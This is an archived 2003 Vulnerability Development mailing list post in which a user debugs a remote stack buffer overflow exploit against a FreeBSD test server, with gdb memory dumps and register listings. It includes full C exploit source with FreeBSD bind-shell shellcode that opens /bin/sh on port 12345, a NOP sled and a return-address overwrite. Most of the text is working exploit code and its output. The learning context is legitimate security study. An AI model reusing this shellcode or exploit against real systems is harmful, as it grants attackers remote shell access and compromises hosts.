Vulnerability Development mailing list archives
Re: sample buffer overflow exploit problem
From: Ganbold <ganbold () micom mng net>
Date: Wed, 01 Oct 2003 10:06:52 +0900
Hi Orlando, I tested your modified exploit. When I run exploit with offset 320: ----------------------------------------------------------------------------------------------------------------------------- bash-2.05b$ ./expl_or 127.0.0.1 30460 320 scsize: 131 ret: 0xbfbffa40 bash-2.05b$ ----------------------------------------------------------------------------------------------------------------------------- In gdb on server I see: ----------------------------------------------------------------------------------------------------------------------------- (gdb) run 30460 The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/home/tsgan/bof_files/vulnerable 30460 client from 127.0.0.1 -----------------------------------------------------------------------------------------------------------------------------It binds shell to port 12345. When I make connection to it in gdb I see following:
-----------------------------------------------------------------------------------------------------------------------------
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0xbfbffa8f in ?? ()
(gdb) x/200bx $esp-200
0xbfbff9c8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9d0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9d8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9e0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9e8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9f0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9f8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa00: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa08: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa10: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa18: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa20: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa28: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa30: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa38: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa40: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa48: 0x90 0x90 0x90 0x6a 0x10 0x89 0xe1 0x83
^^^^^^ shellcode begins
0xbfbffa50: 0xec 0x10 0x89 0xe3 0x31 0xc0 0x50 0x50
0xbfbffa58: 0x50 0x66 0x68 0x30 0x39 0xb4 0x20 0x66
0xbfbffa60: 0x50 0x89 0xe2 0x6a 0x06 0x6a 0x01 0x6a
0xbfbffa68: 0x02 0x50 0x30 0xe4 0xb0 0x61 0xcd 0x80
0xbfbffa70: 0x89 0xc7 0x6a 0x10 0x52 0x50 0x50 0xb0
0xbfbffa78: 0x68 0xcd 0x80 0x31 0xc0 0x50 0x57 0x50
0xbfbffa80: 0x83 0xc0 0x6a 0xcd 0x80 0x51 0x53 0x57
0xbfbffa88: 0x50 0xb0 0x1e 0xcd 0x80 0x89 0xc3 0x31
-----------------------------------------------------------------------------------------------------------------------------
As you see shellcode is not full, I see only half of my shellcode.
So when exploit run server doesn't crash and binds shell port. But when I
make connection
to 12345 port, server crashes and x/200bx $esp-200 command shows above half
of my shellcode.
Following is register information after crash: ----------------------------------------------------------------------------------------------------------------------------- (gdb) info all-registers eax 0x9 9 ecx 0xbfbffaec -1077937428 edx 0xbfbffacc -1077937460 ebx 0x9 9 esp 0xbfbffa90 0xbfbffa90 ebp 0xbfbffa40 0xbfbffa40 esi 0xbfbffb80 -1077937280 edi 0x8 8 eip 0xbfbffa8f 0xbfbffa8f eflags 0x10206 66054 cs 0x1f 31 ss 0x2f 47 ds 0x2f 47 es 0x2f 47 fs 0x2f 47 gs 0x2f 47 st0 -nan(0x0000ca000) (raw 0xffff00000000000ca000) st1 -nan(0x000002000) (raw 0xffff0000000000002000) st2 0 (raw 0x00000000000000000000) st3 0 (raw 0x00000000000000000000) st4 0 (raw 0x00000000000000000000)st5 3.6715164242195896804332733154296875e-10 (raw 0x3fdfc9d8000000000000)
st6 24 (raw 0x4003c000000000000000)
st7 60 (raw 0x4004f000000000000000)
fctrl 0x127f 4735
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
-----------------------------------------------------------------------------------------------------------------------------
But when I run exploit with 0 offset I see different situation:
-----------------------------------------------------------------------------------------------------------------------------
bash-2.05b$ ./expl_or 127.0.0.1 30460 0
scsize: 131
ret: 0xbfbffb80
bash-2.05b$
-----------------------------------------------------------------------------------------------------------------------------
In gdb on server I see:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) run 30460
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/tsgan/bof_files/vulnerable 30460
client from 127.0.0.1
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGILL, Illegal instruction.
0xbfbffb8c in ?? ()
(gdb) x/300bx $esp-300
0xbfbffa48: 0x90 0x90 0x90 0x6a 0x10 0x89 0xe1 0x83
^^^^^^ shellcode begins
0xbfbffa50: 0xec 0x10 0x89 0xe3 0x31 0xc0 0x50 0x50
0xbfbffa58: 0x50 0x66 0x68 0x30 0x39 0xb4 0x20 0x66
0xbfbffa60: 0x50 0x89 0xe2 0x6a 0x06 0x6a 0x01 0x6a
0xbfbffa68: 0x02 0x50 0x30 0xe4 0xb0 0x61 0xcd 0x80
0xbfbffa70: 0x89 0xc7 0x6a 0x10 0x52 0x50 0x50 0xb0
0xbfbffa78: 0x68 0xcd 0x80 0x31 0xc0 0x50 0x57 0x50
0xbfbffa80: 0x83 0xc0 0x6a 0xcd 0x80 0x51 0x53 0x57
0xbfbffa88: 0x50 0xb0 0x1e 0xcd 0x80 0x89 0xc3 0x31
0xbfbffa90: 0xc0 0x50 0x53 0x50 0xb0 0x5a 0xcd 0x80
0xbfbffa98: 0xb0 0x01 0x50 0x53 0x50 0x83 0xc0 0x59
0xbfbffaa0: 0xcd 0x80 0xb0 0x02 0x50 0x53 0x50 0x83
0xbfbffaa8: 0xc0 0x58 0xcd 0x80 0x31 0xc0 0x50 0x68
0xbfbffab0: 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69
0xbfbffab8: 0x6e 0x89 0xe3 0x50 0x53 0x89 0xe2 0x50
0xbfbffac0: 0x52 0x53 0x50 0xb0 0x3b 0xcd 0x80 0x31
0xbfbffac8: 0xc0 0x40 0x50 0x50 0xcd 0x80 0x90 0x90
^^^^^^
shellcode ends
0xbfbffad0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffad8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffae0: 0x90 0x90 0x90 0x90 0x80 0xfb 0xbf 0xbf^^^^^^ return address
0xbfbffae8: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
0xbfbffaf0: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
0xbfbffaf8: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
0xbfbffb00: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
0xbfbffb08: 0x80 0xfb 0xbf 0x2c 0x20 0x6e 0x69 0x63
^^^^^^ ends here
0xbfbffb10: 0x65 0x20 0x74 0x6f 0x20 0x6d 0x65 0x65
0xbfbffb18: 0x74 0x20 0x79 0x6f 0x75 0x21 0x0d 0x0a
0xbfbffb20: 0x00 0x00 0x00 0x00 0x74 0x02 0x76 0xfc
0xbfbffb28: 0x00 0x00 0x00 0x00 0x41 0xc6 0x04 0x28
0xbfbffb30: 0x7e 0xf7 0x0f 0x28 0x60 0x00 0x00 0x00
0xbfbffb38: 0x10 0x00 0x00 0x00 0x07 0x00 0x00 0x00
0xbfbffb40: 0x06 0x00 0x00 0x00 0x02 0x00 0x00 0x00
0xbfbffb48: 0x6c 0xfb 0xbf 0xbf 0x6c 0xfb 0xbf 0xbf
0xbfbffb50: 0x15 0x87 0x04 0x08 0x02 0x00 0x00 0x00
0xbfbffb58: 0x74 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
0xbfbffb60: 0x68 0xfb 0xbf 0xbf 0x00 0x00 0x00 0x00
0xbfbffb68: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffb70: 0x02 0x00 0x00 0x00
-----------------------------------------------------------------------------------------------------------------------------
As you see I see all my shellcode and return address fully.
Following is the register infos:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) info all-registers
eax 0xffffffff -1
ecx 0x9 9
edx 0xffffffff -1
ebx 0x2 2
esp 0xbfbffb74 0xbfbffb74
ebp 0xbfbffb80 0xbfbffb80
esi 0xbfbffb80 -1077937280
edi 0xbfbffcb2 -1077936974
eip 0xbfbffb8c 0xbfbffb8c
eflags 0x10246 66118
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
st0 -nan(0x0000ca000) (raw 0xffff00000000000ca000)
st1 -nan(0x000002000) (raw 0xffff0000000000002000)
st2 0 (raw 0x00000000000000000000)
st3 0 (raw 0x00000000000000000000)
st4 0 (raw 0x00000000000000000000)
st5 0 (raw 0x00000000000000000000)
st6 0 (raw 0x00000000000000000000)
st7 10 (raw 0x4002a000000000000000)
fctrl 0x127f 4735
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
-----------------------------------------------------------------------------------------------------------------------------
I'm very confused and I don't know yet what to do.
Please give me some advice.
thanks in advance,
Ganbold
At 01:45 PM 9/30/2003 -0500, you wrote:
attachment
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <errno.h>
#include <unistd.h>
/*
* FreeBSD shellcode - binds /bin/sh to a port 12345
*
* Claes M. Nyberg 20020619
*
* <cmn () darklab org>, <md0claes () mdstud chalmers se>
*/
char shellcode[]
=
/* port _______*/
"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
"\x40\x50\x50\xcd\x80";
#define RET 0xbfbffb80 //0xbfbffa48
int exec_sh(int sockfd)
{
char snd[4096],rcv[4096];
fd_set rset;
while(1)
{
FD_ZERO(&rset);
FD_SET(fileno(stdin),&rset);
FD_SET(sockfd,&rset);
select(255,&rset,NULL,NULL,NULL);
if(FD_ISSET(fileno(stdin),&rset))
{
memset(snd,0,sizeof(snd));
fgets(snd,sizeof(snd),stdin);
write(sockfd,snd,strlen(snd));
}
if(FD_ISSET(sockfd,&rset))
{
memset(rcv,0,sizeof(rcv));
if(read(sockfd,rcv,sizeof(rcv))<=0)
exit(0);
fputs(rcv,stdout);
}
}
}
int main(int argc, char *argv[]) {
char buffer[1064];
int s,t, i, size,offset;
struct sockaddr_in remote;
struct hostent *host;
if(argc != 4) {
printf("Usage: %s target-ip port offset\n", argv[0]);
return -1;
}
offset = RET - atoi(argv[3]);
// filling buffer with NOPs
memset(buffer, 0x90, 1064);
printf("scsize: %d\nret: 0x%x\n",sizeof(shellcode)-1,offset);
//copying shellcode into buffer
memcpy(buffer+1001-sizeof(shellcode) , shellcode,
sizeof(shellcode)-1);
// Copying the return address multiple times at the end of the
buffer...
for(i=1022; i < 1060; i+=4) {
* ((int *) &buffer[i]) = offset;
}
buffer[1061] = 0x0;
//getting hostname
host=gethostbyname(argv[1]);
if (host==NULL)
{
fprintf(stderr, "Unknown Host %s\n",argv[1]);
return -1;
}
// creating socket...
s = socket(AF_INET, SOCK_STREAM, 0);
if (s < 0)
{
fprintf(stderr, "Error: Socket\n");
return -1;
}
remote.sin_family = AF_INET;
remote.sin_addr = *((struct in_addr *)host->h_addr);
remote.sin_port = htons(atoi(argv[2]));
// connecting with destination host
if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
{
close(s);
fprintf(stderr, "Error: connect\n");
return -1;
}
//sending exploit string
size = send(s, buffer, sizeof(buffer), 0);
if (size==-1)
{
close(s);
fprintf(stderr, "sending data failed\n");
return -1;
}
/*
printf("[-] Connecting to bindshell...\n");
remote.sin_family = AF_INET;
remote.sin_addr = *((struct in_addr *)host->h_addr);
remote.sin_port = htons(12345);
if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
{
close(s);
fprintf(stderr, "Error: connect\n");
return -1;
}
exec_sh(s);
*/
// closing socket
close(s);
}
Current thread:
- Re: sample buffer overflow exploit problem Ganbold (Oct 01)
- <Possible follow-ups>
- Re: sample buffer overflow exploit problem Ganbold (Oct 01)